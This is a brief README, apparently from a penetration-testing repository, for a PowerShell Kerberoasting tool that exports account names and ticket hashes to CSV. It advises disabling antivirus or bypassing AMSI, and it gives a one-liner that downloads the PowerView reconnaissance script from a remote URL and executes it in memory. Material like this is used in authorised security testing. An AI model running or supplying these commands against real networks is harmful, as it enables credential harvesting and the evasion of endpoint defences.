pentestfactory/Invoke-Kerberoast/README.md

 # Invoke-Kerberoast
 PowerShell script to execute Kerberoasting and export samaccountname and hash to CSV.

+> IT IS RECOMMENDED TO DISABLE AV OR BYPASS AMSI

 #### Download PowerView into Memory
 ````
 iex(new-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/pentestfactory/PowerSploit/dev/Recon/PowerView.ps1');Get-NetDomain;